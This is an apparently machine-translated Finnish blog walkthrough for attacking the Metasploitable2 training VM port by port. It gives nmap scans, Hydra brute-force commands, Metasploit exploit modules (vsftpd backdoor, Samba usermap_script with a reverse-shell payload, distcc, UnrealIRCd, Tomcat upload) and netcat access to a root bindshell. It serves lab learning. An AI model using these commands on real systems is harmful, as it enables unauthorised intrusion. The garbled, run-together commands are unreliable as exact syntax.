Metasploitable2

Metasploitable on tarkoituksellisesti haavoittuva Linux-virtuaalikone.

Tätä VM:ää voidaan käyttää tietoturvakoulutuksen suorittamiseen, tietoturvatyökalujen testaamiseen ja yleisten tunkeutumistestaustekniikoiden harjoitteluun.

Asennus ja konfigurointi

Olemme tässä hyödyntämässä Metasploitable 2:ta (pahuksen haavoittuva kone tunkeutumistestausta varten)

Hanki tämä Metasploiable2-kone osoitteesta https://information.rapid7.com/download-metasploitable-2017.html

Asennusprosessi:

  1. Avaa VirtualBox ja klikkaa ”New” painiketta luodaksesi uuden virtuaalikoneen
  2. Kirjoita virtuaalikoneen nimi(Metasploitable2)
  3. Varaa muistin määrä(mieluiten, mutta ei alle 512mb)
  4. Valitse Käytä olemassa olevaa kiintolevytiedostoa
  5. Valitse Rapid7:lta lataamasi vmdk-tiedosto
  6. Klikkaa Create…!!! Onnistui Metasploitable2:n asennus, Nyt on aika määrittää verkkoasetukset.

Asennuksen jälkeen vaihda verkkosovittimen asetukset seuraavasti :

In-Network Setting: Settings/Network/Adapter Select Ethernet or Wireless

In Advanced tab Select: Promiscuous Mode as Allow All

Käynnistä Metasploitable2-kone ja yritä kirjautua sisään annetuilla tunnuksilla Banneriin…!!!!

Löydä koneen IP-osoite käyttämällä seuraavaa komento terminaalissa

ifconfig

Tämä on kaikki asennusta varten….Aloitetaan hakkerointi…

Skannaus

Skannaus Matasploitable 2

Kuten huomasimme koneen IP-osoite on 192.168.0.130

Aloitetaan skannaus Nmapilla, joka on osa Kali Linuxia

nmap -sV -p- 192.168.0.130

Hyödynnetään kaikkia portteja eri tekniikoilla :

Method 1:

Login with Anonymous as username and no password.

Jos tarvitset lisätietoa Anonymous FTP:stä, löydät sen täältä.

https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

ftp 192.168.0.130

Menetelmä 2 :

Käyttämällä raakaa väkivaltaa Hydran avulla, mutta tarvitset mukautetun listan käyttäjätunnuksista ja salasanoista.

hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V

Se ottaa jokaisen käyttäjätunnuksen ja salasanan annetuista tiedostoista ja yrittää kirjautua kohteena olevaan FTP-palveluun.

Kun tunnukset on löydetty, voit kirjautua suoraan sisään.

Käyttäjätilin kirjautumisen jälkeen voit saada pääkäyttäjän oikeudet (root-oikeudet) tekemällä Privilege escalation.

Menetelmä 3 :

Exploita FTP:tä Metasploit-kehyksen kautta

avaa Metasploit-kehyksen konsoli ja etsi vsftpd Backdoor -hyödyntäminen

msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor

.

show options

set RHOSTS 192.168.0.130 --> <target IP address>exploit

Onneksi olkoon, että sait pääkäyttäjän oikeudet

22-SSH

Secure Shell (SSH) on kryptografinen verkkoprotokolla, jolla voidaan käyttää verkkopalveluja turvallisesti suojaamattoman verkon yli.

SSH:n hyödyntäminen eri tekniikoilla

Metodi 1

Käyttäjätunnuksen ja salasanan murtaminen Hydralla

Hydra on Kali-Linuxin sisäänrakennettu työkalu, jota käytetään Brute force -hyökkäykseen Brute force -hyökkäys on sovellusohjelmien käyttämä kokeilemalla ja erehtymällä suoritettava menetelmä, jolla pyritään purkamaan salattuja tietoja, kuten salasanoja tai DES-avaimia, käyttämällä tyhjentäviä ponnisteluja (käyttäen brute force -menetelmää) älykkäiden strategioiden käyttämisen sijaan.

hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>

Menetelmä 2

Avaa Metasploit-kehys

Avaa päätelaite ja näppäile nämä komennot :

service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login

aseta tämä apuvälineohjelma, ja katso, mitä se vaatii.

set RHOSTS <target IP Address> --> in my case 192.168.0.130

Aseta valmiiksi määritetty Käyttäjätunnusten lista ja Salasanojen lista

set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit

Se ottaa aikapohjaisesti käyttäjätunnusten ja salasanojen listan ja Se Ilmoittaa Käyttäjätunnus: Salasana ja kirjaudu sisään näillä tunnuksilla.

ssh username@targetipaddress

Sinulla on käyttäjäoikeudet, et voi suorittaa kaikkia tehtäviä, joten yritä saada pääkäyttäjäoikeus tekemällä Privilege escalation.

23-TELNET

Telnet on yksinkertainen, tekstipohjainen verkkoprotokolla, jota käytetään etätietokoneiden käyttämiseen TCP/IP-verkoissa, kuten Internetissä. Telnet luotiin ja lanseerattiin vuonna 1969, ja historiallisesti voidaan sanoa, että se oli ensimmäinen Internet.

telnet <target IP Address> --> 192.168.0.130

Esimerkkinä se nappaa Metasploitable 2 -bannerin, se näyttää, että Kirjaudu sisään komennolla msfadmin/msfadmin saadaksesi alun perin. Syötä vain nuo tunnukset niin olet sisällä.

25-SMTP

SMTP on osa TCP/IP-protokollan sovelluskerrosta. Käyttämällä prosessia nimeltä ”tallenna ja lähetä eteenpäin” SMTP siirtää sähköpostisi verkoissa ja niiden välillä. Se tekee tiivistä yhteistyötä postinsiirtoagentin (MTA) kanssa lähettääkseen viestisi oikeaan tietokoneeseen ja sähköpostilaatikkoon.

Menetelmä 1:

Käyttämällä Metasploitia

Käynnistä Metasploit suorittamalla komennot

service postgresql startmsfconsole -qsearch smtp_version

.

use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run

SMTP on lyhenne sanoista Simple Mail Transport Protocol (yksinkertaisen postin kuljetusprotokolla).palvelimelta-palvelimelle-protokolla ja pitää paikallista tietokantaa käyttäjistä, joille sen on lähetettävä ja vastaanotettava sähköposteja.

SMTP:llä on joukko komentoja. Otamme yhteyden kohteeseemme ”netcatilla” portin 25 kautta ja yritämme hankkia tämän tietokannan sähköpostit.

Avaa uusi terminaali ja kirjoita:

nc 192.168.0.130 25

Nyt kun yhteys on muodostettu, voit todentaa sen ”SMTP”-komennoilla

Type: vrfy user

vrfy (Tämä ei oleinteraktiivinen komentotulkki)

SMTP-komentoja varten käy osoitteessa: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm

Method 2

Using smtp_enum

This is can be done by Metasploit

search smtp_enum

.

use auxiliary/scanner/smtp/smtp_enum

show optionsset RHOST 192.168.0.130exploit

Tässä metodissa käytetään enumeraatiota, jolla saadaan selville tämä SMTP-palvelun käyttäjälista.

Myöhemmin NetCat voi auttaa saamaan käänteisen yhteyden kyseiseen käyttäjään.

139&445 Netbios-SSN

Samba on avoimen lähdekoodin projekti, jota käytetään laajalti Linux- ja Unix-tietokoneissa, jotta ne voivat työskennellä Windowsin tiedosto- ja tulostuspalveluiden kanssa.

Voidaan käyttää Sambaa jopa Active-palvelimena hoitamaan kirjautumista, todennusta ja pääsynvalvontaa Windows-verkkoon.

Hyökkäyksen etsiminen

use exploit/multi/samba/usermap_script

Hyökkäyksen vaihtoehtojen tarkasteleminen

.

Hyötykuorman asettaminen

Show payloadsSet payload cmd/unix/reverse

Hyötykuorman edellyttämien argumenttien asettaminen

.

Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444

Tarkista, kun kaikki vaaditut argumentit on täytetty

exploit

1099-Java-RMI

Remote Method Invocation (RMI) on API, jonka avulla objekti voi kutsua metodia toisessa osoiteavaruudessa olevalle objektille, joka voi olla samassa koneessa tai etäkoneessa.

Hyökkäys java-RMI-palvelimen

haku

search java_rmi_server

Valitse käyttökohde niiden luokituksen mukaan. esimerkiksi ”erinomainen” toimii paremmin kuin ”normaali”.

use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit

Simme pääsyn kohdekoneeseen.

1524-BINDSHELL

Sidekuori (Bind shell) on kuorityyppi, jossa kohdekone avaa uhrikoneeseen tietoliikennöintiportin tai kuuntelijan, ja se odottaa saapuvaa yhteyttä. Tämän jälkeen hyökkääjä muodostaa yhteyden uhrikoneen kuuntelijaan, joka sitten johtaa koodin tai komennon suorittamiseen palvelimella.

Hyökkäys

Se on root-kuori, joten voimme muodostaa yhteyden netcat-palvelun kautta.

nc <target ip address> 1524

Onnittelut, olet nyt pääkäyttäjä.

2121-ProFTPD

Ennen tämän portin hyväksikäyttöä tarvitset kirjautumistiedot, joten kuten tiedämme menetelmän saat sen Brute-force-tekniikalla, Pääsemme ProFTPd:hen telnetillä, Käytämme täällä käyttäjää: user.

telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>

Se on normaali käyttäjä, Kokeile Privilege Escalationia saadaksesi pääkäyttäjän hallinnan.

3306-MYSQL

Menetelmä 1:

Haeat for the exploit

search scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login

.

Joskus saattaa olla mahdollista, että MySQL:n salasana on tyhjä. Voimme siis hyödyntää sitä suoraan.

Huomaa: oletusarvoisesti se näyttää BLANK_PASSWORDS:n vääräksi, aseta se true:ksi.

set BLANK_PASSWORDS as true

Menetelmä:2

Tässä menetelmässä aiomme hyväksikäyttää MySQL:ää käyttämällä tätä komentoa antaen käyttäjänimen root ja kohteen IP:n.

mysql -u root -h <target's IP>

3632-DISTCCD

Distcc on työkalu, jonka avulla voidaan nopeuttaa lähdekoodin kääntämistä käyttämällä hajautettua tietojenkäsittelyä tietoverkossa. Oikealla konfiguraatiolla

distcc voi lyhentää projektin kääntämisaikaa dramaattisesti

Hyödyntämällä porttia 3632 distcc:n avulla-exec

Avaa msfconsole ja etsi distcc_exec

search distcc_execshow options

Aseta tarvittavat argumentit hyväksikäyttöä varten

set RHOSTS <target-ip>exploit

Saimme Shell-käytön…yritetään tehdä privilege escalation for Higher privilege

Exploiting PostgreSQL with postgre_payload

Open msfconsole & search for postgres_payload

.

search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options

Aseta vaadittavat argumentit hyväksikäyttöä varten

set RHOSTS <target-ip>

Oletuksena, se käyttää käyttäjätunnuksena postgres

exploit

Suoritti onnistuneen kirjautumisen postgresql…Hankitaan shell, jolla voi tehdä lisää juttuja…

Yritetään tehdä privilege escalation…Hyvää oppimista..!!!

5900-VNC

Avaa msfconsole ja etsi exploit vnc_login

search vnc_loginuse auxiliary/scanner/vnc/vnc_login

show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit

Menetelmää käytetään Linux- tai Unix- tai Windows-käyttöjärjestelmissä isännöityjen VNC-ohjelmistojen hyväksikäyttöön todennushaavoittuvuudella.

Yritä muodostaa vnc-yhteys kyseisellä salasanalla

Avaa Vnc Viewer terminaalissa & Kirjoita IP-osoite ja muodosta yhteys

kirjautumiskehote ponnahtaa esiin. ja pyytää antamaan tunnukset

Sitten syötä salasana ja valitse OK.

Voilaaa…!!! Sinulla on Access…Tiedän mitä ajattelet juuri nyt…Älä sotke asioita ympärillä..hyvää oppimista.

6000-X11

X Window System (eli X) on UNIX-pohjaisissa käyttöjärjestelmissä yleinen bittikarttanäytöille tarkoitettu ikkunointijärjestelmä. X tarjoaa peruspuitteet graafiseen käyttöliittymään perustuvalle ympäristölle.

X11-etäkäyttöinen palvelin ottaa yhteyksiä vastaan mistä tahansa, mihin saa Internet-yhteyden. Se vastaa pääsystä näytönohjaimiin, syöttölaitteisiin ja näyttöön joko tietokoneella tai langattomalla laitteella.

Portin 6000 hyväksikäyttö ssh:n avulla

ssh -X -l msfadmin 192.168.0.122

Yllä olevassa komennossa ’X’ ottaa käyttöön kaikki porttien välitykset, antamalla käyttäjätunnus ja kohteen IP antaa meille komentotulkin

6667 & 6697 UnrealIRCD

UnrealIRCd on avoimen lähdekoodin IRC-palvelin, joka on palvellut tuhansia verkoissa vuodesta 1999 lähtien. Se toimii Linuxissa, OS X:ssä ja Windowsissa

UnrealIRCd on erittäin kehittynyt IRCd, jossa keskitytään vahvasti modulaarisuuteen, kehittyneeseen ja hyvin konfiguroitavaan asetustiedostoon. Tärkeimpiin ominaisuuksiin kuuluu SSL

UnrealIRCd on yksi suosituimmista ja monipuolisimmista IRC-daemoneista, ja sitä käytetään suurimmassa osassa IRC-palvelimia

Tämän palvelimen on kuvailtu sisältävän mahdollisesti eniten tietoturvaominaisuuksia kaikista IRC-palvelimista.

Käytetyt protokollat:

Hyödynnetään tätä IRC-palvelinta.

Menetelmä 1: portissa 6667

search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options

Asetetaan tarvittavat argumentit hyväksikäyttöä varten

set RHOSTS <target-ip>

.

oletusarvoisesti exploit

run (or) exploit

Heyyy…We got root…We are living on the edge…

Method 2: Try to Exploit this…Happy learning

8180-TOMCAT

Apache Tomcat on avoimen lähdekoodin toteutus Java Servlet-, JavaServer Pages-, Java Expression Language- ja WebSocket-teknologioista. Tomcat tarjoaa ”puhdas Java” HTTP-verkkopalvelinympäristön, jossa voidaan suorittaa Java-koodia.

Apache-Tomcatin hyödyntäminen

Se voidaan suorittaa kahdessa vaiheessa:

Avaa msfconsole & etsi hakusanalla tomcat_mgr_login

search tomcat_mgr_loginset RHOSTS <target-ip>

show options

Hyökkäys määrittelee oletusarvoisiksi asetetut käyttäjätunnukset & salasanojen listat. Kun olet asettanut argumentit exploitille Type exploit (tai) run

run

Vastaanottaa saman käyttäjätunnuksen ja salasanan ja antaa sen seuraavalle exploitille.

haku tomcat manager exploitit

search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options

Säädä RHOSTS, RPORT ja HttpPassword, HttpUsername, jotka saimme tomcatin kirjautumishyökkäyksen exploitista ja suorita sitten exploit.

msfconsole voisi määrittää sopivan hyötykuorman exploitille, Siksi saimme meterpreterin…

8787-Ruby-drb

dRuby on hajautettu oliojärjestelmä Rubylle. Se on kirjoitettu puhtaalla Rubyllä ja käyttää sen protokollaa.

Ei tarvita muita lisäpalveluita kuin ne, jotka Rubyn ajoaika tarjoaa, kuten TCP-socketit.

search drb_remote_codeexec

Aseta tarvittavat argumentit hyväksikäyttöä varten

show optionsset RHOSTS <target-ip>exploit (or) run

Onnittelut, että sait pääkäyttäjän pääkäyttäjän komentotulkkioikeudet… kokeile käyttää joitain komentotulkkikomentoja…

Vastaa

Sähköpostiosoitettasi ei julkaista.